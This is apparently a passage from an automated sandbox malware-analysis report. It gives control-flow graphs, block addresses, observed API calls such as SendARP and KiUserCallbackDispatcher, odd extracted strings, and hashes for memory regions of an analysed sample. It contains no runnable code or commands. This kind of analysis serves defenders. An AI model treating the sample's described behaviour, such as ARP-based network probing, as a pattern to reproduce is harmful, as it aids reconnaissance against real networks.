KiUserExceptionDispatcher 28321->28323 28324 57a0a7c KiUserExceptionDispatcher 28321->28324 28322->28273 28323->28322 28324->28322 28326 c67e8a 28325->28326 28327 c67f8b 28326->28327 28328 57a0a6a KiUserExceptionDispatcher 28326->28328 28329 57a0a7c KiUserExceptionDispatcher 28326->28329 28327->28273 28328->28327 28329->28327 28331 c67eeb 28330->28331 28332 c67f8b 28331->28332 28333 57a0a6a KiUserExceptionDispatcher 28331->28333 28334 57a0a7c KiUserExceptionDispatcher 28331->28334 28332->28273 28333->28332 28334->28332 28336 c67e5e 28335->28336 28337 c67f8b 28336->28337 28338 57a0a6a KiUserExceptionDispatcher 28336->28338 28339 57a0a7c KiUserExceptionDispatcher 28336->28339 28337->28273 28338->28337 28339->28337 28341 c67ec4 28340->28341 28342 c67f8b 28341->28342 28343 57a0a6a KiUserExceptionDispatcher 28341->28343 28344 57a0a7c KiUserExceptionDispatcher 28341->28344 28342->28273 28343->28342 28344->28342 28346 57a0a7d 28345->28346 28347 57a0a95 28346->28347 28348 57a0a82 KiUserExceptionDispatcher 28346->28348 28347->28292 28348->28346 28350 57a0a7d 28349->28350 28351 57a0a82 KiUserExceptionDispatcher 28350->28351 28352 57a0a95 28350->28352 28351->28350 28352->28292

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 162 c65ac0-c65b26 164 c65b70-c65b72 162->164 165 c65b28-c65b33 162->165 166 c65b74-c65b8d 164->166 165->164 167 c65b35-c65b41 165->167 173 c65b8f-c65b9b 166->173 174 c65bd9-c65bdb 166->174 168 c65b64-c65b6e 167->168 169 c65b43-c65b4d 167->169 168->166 171 c65b51-c65b60 169->171 172 c65b4f 169->172 171->171 175 c65b62 171->175 172->171 173->174 176 c65b9d-c65ba9 173->176 177 c65bdd-c65c35 174->177 175->168 178 c65bcc-c65bd7 176->178 179 c65bab-c65bb5 176->179 186 c65c37-c65c42 177->186 187 c65c7f-c65c81 177->187 178->177 180 c65bb7 179->180 181 c65bb9-c65bc8 179->181 180->181 181->181 183 c65bca 181->183 183->178 186->187 188 c65c44-c65c50 186->188 189 c65c83-c65c9b 187->189 190 c65c52-c65c5c 188->190 191 c65c73-c65c7d 188->191 196 c65ce5-c65ce7 189->196 197 c65c9d-c65ca8 189->197 192 c65c60-c65c6f 190->192 193 c65c5e 190->193 191->189 192->192 195 c65c71 192->195 193->192 195->191 198 c65ce9-c65d3a 196->198 197->196 199 c65caa-c65cb6 197->199 207 c65d40-c65d4e 198->207 200 c65cb8-c65cc2 199->200 201 c65cd9-c65ce3 199->201 202 c65cc6-c65cd5 200->202 203 c65cc4 200->203 201->198 202->202 205 c65cd7 202->205 203->202 205->201 208 c65d57-c65db7 207->208 209 c65d50-c65d56 207->209 216 c65dc7-c65dcb 208->216 217 c65db9-c65dbd 208->217 209->208 219 c65dcd-c65dd1 216->219 220 c65ddb-c65ddf 216->220 217->216 218 c65dbf 217->218 218->216 219->220 223 c65dd3 219->223 221 c65de1-c65de5 220->221 222 c65def-c65df3 220->222 221->222 224 c65de7-c65dea call c60c34 221->224 225 c65df5-c65df9 222->225 226 c65e03-c65e07 222->226 223->220 224->222 225->226 228 c65dfb-c65dfe call c60c34 225->228 229 c65e17-c65e1b 226->229 230 c65e09-c65e0d 226->230 228->226 233 c65e1d-c65e21 229->233 234 c65e2b-c65e2f 229->234 230->229 232 c65e0f-c65e12 call c60c34 230->232 232->229 233->234 238 c65e23 233->238 235 c65e31-c65e35 234->235 236 c65e3f 234->236 235->236 239 c65e37 235->239 240 c65e40 236->240 238->234 239->236 240->240
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-3644837717
                                                                                                                                                                                                                                  • Opcode ID: 8ac216712a23c1e71ec35446c7fcdd1a126fb95f9ee05e95279d276253839f09
                                                                                                                                                                                                                                  • Instruction ID: 8b0b935081c164fde506a3d41de66d286f8b56bb2198a9e136690682de951395
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ac216712a23c1e71ec35446c7fcdd1a126fb95f9ee05e95279d276253839f09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26B15D70E006099FDF24CFA9D9D579EBBF2BF88304F248129D815A7294EB749946CF81

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 584 c66390-c663f6 586 c66440-c66442 584->586 587 c663f8-c66403 584->587 588 c66444-c6645d 586->588 587->586 589 c66405-c66411 587->589 595 c6645f-c6646b 588->595 596 c664a9-c664ab 588->596 590 c66434-c6643e 589->590 591 c66413-c6641d 589->591 590->588 593 c66421-c66430 591->593 594 c6641f 591->594 593->593 597 c66432 593->597 594->593 595->596 598 c6646d-c66479 595->598 599 c664ad-c664c5 596->599 597->590 600 c6649c-c664a7 598->600 601 c6647b-c66485 598->601 606 c664c7-c664d2 599->606 607 c6650f-c66511 599->607 600->599 602 c66487 601->602 603 c66489-c66498 601->603 602->603 603->603 605 c6649a 603->605 605->600 606->607 609 c664d4-c664e0 606->609 608 c66513-c6652b 607->608 616 c66575-c66577 608->616 617 c6652d-c66538 608->617 610 c664e2-c664ec 609->610 611 c66503-c6650d 609->611 612 c664f0-c664ff 610->612 613 c664ee 610->613 611->608 612->612 615 c66501 612->615 613->612 615->611 618 c66579-c665ec 616->618 617->616 619 c6653a-c66546 617->619 628 c665f2-c66600 618->628 620 c66548-c66552 619->620 621 c66569-c66573 619->621 623 c66556-c66565 620->623 624 c66554 620->624 621->618 623->623 625 c66567 623->625 624->623 625->621 629 c66602-c66608 628->629 630 c66609-c66669 628->630 629->630 637 c6666b-c6666f 630->637 638 c66679-c6667d 630->638 637->638 639 c66671 637->639 640 c6667f-c66683 638->640 641 c6668d-c66691 638->641 639->638 640->641 642 c66685 640->642 643 c66693-c66697 641->643 644 c666a1-c666a5 641->644 642->641 643->644 647 c66699 643->647 645 c666a7-c666ab 644->645 646 c666b5-c666b9 644->646 645->646 648 c666ad 645->648 649 c666bb-c666bf 646->649 650 c666c9-c666cd 646->650 647->644 648->646 649->650 651 c666c1-c666c4 call c60c34 649->651 652 c666cf-c666d3 650->652 653 c666dd 650->653 651->650 652->653 655 c666d5-c666d8 call c60c34 652->655 657 c666de 653->657 655->653 657->657
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j
                                                                                                                                                                                                                                  • API String ID: 0-2873887342
                                                                                                                                                                                                                                  • Opcode ID: e2b43315d9bc40faa79ab486726a04a7338a470c7aa46ea441ede5977957831e
                                                                                                                                                                                                                                  • Instruction ID: bd75b430f68e10f0217217354c55549e5cbf3b52395a4c78ba2612f2608de944
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2b43315d9bc40faa79ab486726a04a7338a470c7aa46ea441ede5977957831e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5B14D70E002098FDF20CFA9D9967ADBBF2AF88314F148529E815E7294EB74D945CB81

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 57a5311-57a5374 5 57a537f-57a53b7 KiUserCallbackDispatcher 0->5 6 57a53b9-57a53bf 5->6 7 57a53c0-57a53e6 5->7 6->7
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 057A53A3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: +/j$4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-130608744
                                                                                                                                                                                                                                  • Opcode ID: ac6c0a5e3fa11d85f7cda49ad601e8b9c940f63fb4d1904e4d190d622d98a5df
                                                                                                                                                                                                                                  • Instruction ID: 1a3a47903ec7bb6ae5c32ed1dd8d56b0df126c24dd551861ea647a2698c30fea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac6c0a5e3fa11d85f7cda49ad601e8b9c940f63fb4d1904e4d190d622d98a5df
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 052169B28002598FCB04DF99E44A7EEFBF4FB48324F14855AE415B7280DB746544CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 10 57a5320-57a53b7 KiUserCallbackDispatcher 14 57a53b9-57a53bf 10->14 15 57a53c0-57a53e6 10->15 14->15
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000050), ref: 057A53A3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID: +/j$4'^q
                                                                                                                                                                                                                                  • API String ID: 2492992576-130608744
                                                                                                                                                                                                                                  • Opcode ID: 479a167ee6087385725e71e272cdd9ca32d6b68384f4880d98dceac6e13e4539
                                                                                                                                                                                                                                  • Instruction ID: 54260cee2b927ca8800e43377121cbfb3a4a85d5216406b8c09f26a7851bbf92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 479a167ee6087385725e71e272cdd9ca32d6b68384f4880d98dceac6e13e4539
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B32137B19042598FCB04DF99E4496EEBBF8BB48324F10855AE419B7280DB746944CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 66 c660fc-c66194 69 c66196-c661a1 66->69 70 c661de-c661e0 66->70 69->70 71 c661a3-c661af 69->71 72 c661e2-c661fa 70->72 73 c661d2-c661dc 71->73 74 c661b1-c661bb 71->74 79 c66244-c66246 72->79 80 c661fc-c66207 72->80 73->72 75 c661bf-c661ce 74->75 76 c661bd 74->76 75->75 78 c661d0 75->78 76->75 78->73 81 c66248-c6625a 79->81 80->79 82 c66209-c66215 80->82 89 c66261-c6628d 81->89 83 c66217-c66221 82->83 84 c66238-c66242 82->84 86 c66225-c66234 83->86 87 c66223 83->87 84->81 86->86 88 c66236 86->88 87->86 88->84 90 c66293-c662a1 89->90 91 c662a3-c662a9 90->91 92 c662aa-c66307 90->92 91->92 99 c66317-c6631b 92->99 100 c66309-c6630d 92->100 102 c6631d-c66321 99->102 103 c6632b-c6632f 99->103 100->99 101 c6630f-c66312 call c60c34 100->101 101->99 102->103 105 c66323-c66326 call c60c34 102->105 106 c66331-c66335 103->106 107 c6633f-c66343 103->107 105->103 106->107 108 c66337 106->108 109 c66345-c66349 107->109 110 c66353 107->110 108->107 109->110 112 c6634b 109->112 113 c66354 110->113 112->110 113->113
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j$\Vnl$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-98801035
                                                                                                                                                                                                                                  • Opcode ID: 8acffc278628de3576883bd0f0b2a599b3c6a93d13a78fc074c7d8c65f66cc9e
                                                                                                                                                                                                                                  • Instruction ID: 63dd8a32c280297dc1e9902efb027fa45bb2aa94dbb6ab39d62b3ac709b7f8bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8acffc278628de3576883bd0f0b2a599b3c6a93d13a78fc074c7d8c65f66cc9e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E715CB0E00209DFDF20DFA9C89579EBBF2BF88314F148129E415A7264DB749946CF91

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 114 c66108-c66194 117 c66196-c661a1 114->117 118 c661de-c661e0 114->118 117->118 119 c661a3-c661af 117->119 120 c661e2-c661fa 118->120 121 c661d2-c661dc 119->121 122 c661b1-c661bb 119->122 127 c66244-c66246 120->127 128 c661fc-c66207 120->128 121->120 123 c661bf-c661ce 122->123 124 c661bd 122->124 123->123 126 c661d0 123->126 124->123 126->121 129 c66248-c6628d 127->129 128->127 130 c66209-c66215 128->130 138 c66293-c662a1 129->138 131 c66217-c66221 130->131 132 c66238-c66242 130->132 134 c66225-c66234 131->134 135 c66223 131->135 132->129 134->134 136 c66236 134->136 135->134 136->132 139 c662a3-c662a9 138->139 140 c662aa-c66307 138->140 139->140 147 c66317-c6631b 140->147 148 c66309-c6630d 140->148 150 c6631d-c66321 147->150 151 c6632b-c6632f 147->151 148->147 149 c6630f-c66312 call c60c34 148->149 149->147 150->151 153 c66323-c66326 call c60c34 150->153 154 c66331-c66335 151->154 155 c6633f-c66343 151->155 153->151 154->155 156 c66337 154->156 157 c66345-c66349 155->157 158 c66353 155->158 156->155 157->158 160 c6634b 157->160 161 c66354 158->161 160->158 161->161
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j$\Vnl$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-98801035
                                                                                                                                                                                                                                  • Opcode ID: f343054f6925f48ce5c417a812f3db91f8ff637d3c13c06390463ce9d9ef5b1f
                                                                                                                                                                                                                                  • Instruction ID: 82c0754cc9eec576ca739f3b4aab7b8c2d2d642988b9b9ca0bdc92ff44af1ec8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f343054f6925f48ce5c417a812f3db91f8ff637d3c13c06390463ce9d9ef5b1f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E714BB0E00209DFDF24DFA9D89179EBBF2BF88314F148129E415A7354EB749946CB91

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 241 c65ab4-c65b26 243 c65b70-c65b72 241->243 244 c65b28-c65b33 241->244 245 c65b74-c65b8d 243->245 244->243 246 c65b35-c65b41 244->246 252 c65b8f-c65b9b 245->252 253 c65bd9-c65bdb 245->253 247 c65b64-c65b6e 246->247 248 c65b43-c65b4d 246->248 247->245 250 c65b51-c65b60 248->250 251 c65b4f 248->251 250->250 254 c65b62 250->254 251->250 252->253 255 c65b9d-c65ba9 252->255 256 c65bdd-c65c35 253->256 254->247 257 c65bcc-c65bd7 255->257 258 c65bab-c65bb5 255->258 265 c65c37-c65c42 256->265 266 c65c7f-c65c81 256->266 257->256 259 c65bb7 258->259 260 c65bb9-c65bc8 258->260 259->260 260->260 262 c65bca 260->262 262->257 265->266 267 c65c44-c65c50 265->267 268 c65c83-c65c9b 266->268 269 c65c52-c65c5c 267->269 270 c65c73-c65c7d 267->270 275 c65ce5-c65ce7 268->275 276 c65c9d-c65ca8 268->276 271 c65c60-c65c6f 269->271 272 c65c5e 269->272 270->268 271->271 274 c65c71 271->274 272->271 274->270 277 c65ce9-c65cfb 275->277 276->275 278 c65caa-c65cb6 276->278 285 c65d02-c65d3a 277->285 279 c65cb8-c65cc2 278->279 280 c65cd9-c65ce3 278->280 281 c65cc6-c65cd5 279->281 282 c65cc4 279->282 280->277 281->281 284 c65cd7 281->284 282->281 284->280 286 c65d40-c65d4e 285->286 287 c65d57-c65db7 286->287 288 c65d50-c65d56 286->288 295 c65dc7-c65dcb 287->295 296 c65db9-c65dbd 287->296 288->287 298 c65dcd-c65dd1 295->298 299 c65ddb-c65ddf 295->299 296->295 297 c65dbf 296->297 297->295 298->299 302 c65dd3 298->302 300 c65de1-c65de5 299->300 301 c65def-c65df3 299->301 300->301 303 c65de7-c65dea call c60c34 300->303 304 c65df5-c65df9 301->304 305 c65e03-c65e07 301->305 302->299 303->301 304->305 307 c65dfb-c65dfe call c60c34 304->307 308 c65e17-c65e1b 305->308 309 c65e09-c65e0d 305->309 307->305 312 c65e1d-c65e21 308->312 313 c65e2b-c65e2f 308->313 309->308 311 c65e0f-c65e12 call c60c34 309->311 311->308 312->313 317 c65e23 312->317 314 c65e31-c65e35 313->314 315 c65e3f 313->315 314->315 318 c65e37 314->318 319 c65e40 315->319 317->313 318->315 319->319
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j$\Vnl
                                                                                                                                                                                                                                  • API String ID: 0-3644837717
                                                                                                                                                                                                                                  • Opcode ID: 3eaea93cd69df9024e675b38b2d697c3dc0b3e1393f987e9f9606251aa6fbb39
                                                                                                                                                                                                                                  • Instruction ID: 0d0fa97f306af6e7bed1b3efbbdd5f4296509e98fcad8955b6a0328d6874ce22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eaea93cd69df9024e675b38b2d697c3dc0b3e1393f987e9f9606251aa6fbb39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20B14D70E006099FDF20CFA9D9C579DBBF1BF88314F248129D869A7294EB749946CF81

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 376 c61750-c6177f 377 c61785-c617f7 call c60af8 376->377 378 c61a2a-c61a8b 376->378 403 c617fd-c61874 377->403 388 c61ab6-c61abf 378->388 390 c61ac1-c61ac7 388->390 391 c61a8d-c61a96 388->391 392 c61aca-c61baf call c60b34 call c61bd0 391->392 393 c61a98-c61aa6 391->393 437 c61bb5-c61bcd 392->437 393->392 394 c61aa8-c61aac 393->394 396 c61ab3 394->396 397 c61aae-c61ab0 394->397 396->388 397->396 421 c61876-c61889 403->421 422 c6188b-c618af 403->422 424 c618b6-c618ba 421->424 422->424 425 c618c5 424->425 426 c618bc 424->426 425->378 426->425
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (bq$Te^q$d7p
                                                                                                                                                                                                                                  • API String ID: 0-1699803613
                                                                                                                                                                                                                                  • Opcode ID: de7ddf60d2618a8ce8dce6041d1eb66720cdd3f37fa13202e0aac8ed3fc14587
                                                                                                                                                                                                                                  • Instruction ID: 847161ffcc40844b03ca653f5b1df69c34116fa609e4016a641ef72f58b2ca01
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de7ddf60d2618a8ce8dce6041d1eb66720cdd3f37fa13202e0aac8ed3fc14587
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10516B34B101148FD754DF69C498A5EBBF6FF89700F2981AAE806DB3A2CA74DD01CB91

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 440 e533e1-e53439 443 e53449-e5347f SendARP 440->443 444 e5343b-e53447 440->444 445 e53481-e53487 443->445 446 e53488-e5349c 443->446 444->443 445->446
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendARP.IPHLPAPI(?,?,00000000,?), ref: 00E53472
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2857955672.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_e50000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Send
                                                                                                                                                                                                                                  • String ID: +/j
                                                                                                                                                                                                                                  • API String ID: 121738739-589978739
                                                                                                                                                                                                                                  • Opcode ID: 104e9083365696eb0f03b0de923a8638ce3665b8d4599f9944f939370250be1a
                                                                                                                                                                                                                                  • Instruction ID: 006d7decd34a990dcbaa8743797b0acc0b1bcceba3aa0100c99413efc98236c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 104e9083365696eb0f03b0de923a8638ce3665b8d4599f9944f939370250be1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6121E4B59002189FCB10DF9AD885BDEFBF4FB48314F10842AE859A7350D374A944CFA5

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 448 e533e8-e53439 450 e53449-e5347f SendARP 448->450 451 e5343b-e53447 448->451 452 e53481-e53487 450->452 453 e53488-e5349c 450->453 451->450 452->453
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendARP.IPHLPAPI(?,?,00000000,?), ref: 00E53472
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2857955672.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_e50000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Send
                                                                                                                                                                                                                                  • String ID: +/j
                                                                                                                                                                                                                                  • API String ID: 121738739-589978739
                                                                                                                                                                                                                                  • Opcode ID: d2ac2684cc7c28b4559d306fbc1807fa21001908b887abb3c039034c1193c18b
                                                                                                                                                                                                                                  • Instruction ID: f7ccee262ff946e8c9064ac1e48d5eaeb8c4988b418e6dc98a12434fbd7dc15a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ac2684cc7c28b4559d306fbc1807fa21001908b887abb3c039034c1193c18b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8921F3B19002089FCB10DFAAD885BDEFBF4FB48310F10842AE859A7350D374AA44CFA4

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 658 c66385-c663f6 660 c66440-c66442 658->660 661 c663f8-c66403 658->661 662 c66444-c6645d 660->662 661->660 663 c66405-c66411 661->663 669 c6645f-c6646b 662->669 670 c664a9-c664ab 662->670 664 c66434-c6643e 663->664 665 c66413-c6641d 663->665 664->662 667 c66421-c66430 665->667 668 c6641f 665->668 667->667 671 c66432 667->671 668->667 669->670 672 c6646d-c66479 669->672 673 c664ad-c664c5 670->673 671->664 674 c6649c-c664a7 672->674 675 c6647b-c66485 672->675 680 c664c7-c664d2 673->680 681 c6650f-c66511 673->681 674->673 676 c66487 675->676 677 c66489-c66498 675->677 676->677 677->677 679 c6649a 677->679 679->674 680->681 683 c664d4-c664e0 680->683 682 c66513-c6652b 681->682 690 c66575-c66577 682->690 691 c6652d-c66538 682->691 684 c664e2-c664ec 683->684 685 c66503-c6650d 683->685 686 c664f0-c664ff 684->686 687 c664ee 684->687 685->682 686->686 689 c66501 686->689 687->686 689->685 692 c66579-c665af 690->692 691->690 693 c6653a-c66546 691->693 701 c665b7-c665ec 692->701 694 c66548-c66552 693->694 695 c66569-c66573 693->695 697 c66556-c66565 694->697 698 c66554 694->698 695->692 697->697 699 c66567 697->699 698->697 699->695 702 c665f2-c66600 701->702 703 c66602-c66608 702->703 704 c66609-c66669 702->704 703->704 711 c6666b-c6666f 704->711 712 c66679-c6667d 704->712 711->712 713 c66671 711->713 714 c6667f-c66683 712->714 715 c6668d-c66691 712->715 713->712 714->715 716 c66685 714->716 717 c66693-c66697 715->717 718 c666a1-c666a5 715->718 716->715 717->718 721 c66699 717->721 719 c666a7-c666ab 718->719 720 c666b5-c666b9 718->720 719->720 722 c666ad 719->722 723 c666bb-c666bf 720->723 724 c666c9-c666cd 720->724 721->718 722->720 723->724 725 c666c1-c666c4 call c60c34 723->725 726 c666cf-c666d3 724->726 727 c666dd 724->727 725->724 726->727 729 c666d5-c666d8 call c60c34 726->729 731 c666de 727->731 729->727 731->731
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j$+/j
                                                                                                                                                                                                                                  • API String ID: 0-2873887342
                                                                                                                                                                                                                                  • Opcode ID: fea8ffee835a0dce0d8a33f809fe0c4979fa502dcbba652505cdecce74909c84
                                                                                                                                                                                                                                  • Instruction ID: fe37dca736cbf222427005f2078983e940ee7b722d8098e7f707df8f2c6af8e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fea8ffee835a0dce0d8a33f809fe0c4979fa502dcbba652505cdecce74909c84
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9A14C70E00209CFDF20CFA9D9867ADBBF1AF88314F248129E855A7294EB74D945CF91
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (bq$(bq
                                                                                                                                                                                                                                  • API String ID: 0-4224401849
                                                                                                                                                                                                                                  • Opcode ID: 3929c042433b350cc7b371c4fba756222c1097add3eb52a33cbcaabb4abb4687
                                                                                                                                                                                                                                  • Instruction ID: b0d626c3f45926ae0db95a44f634451ce900cb2f5dac51976a0ba67140d5c863
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3929c042433b350cc7b371c4fba756222c1097add3eb52a33cbcaabb4abb4687
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2171B0317042404FCB19DF69D89091EBBE6EFC5354714C5BAE809CB3AADE31ED468791
                                                                                                                                                                                                                                  Strings
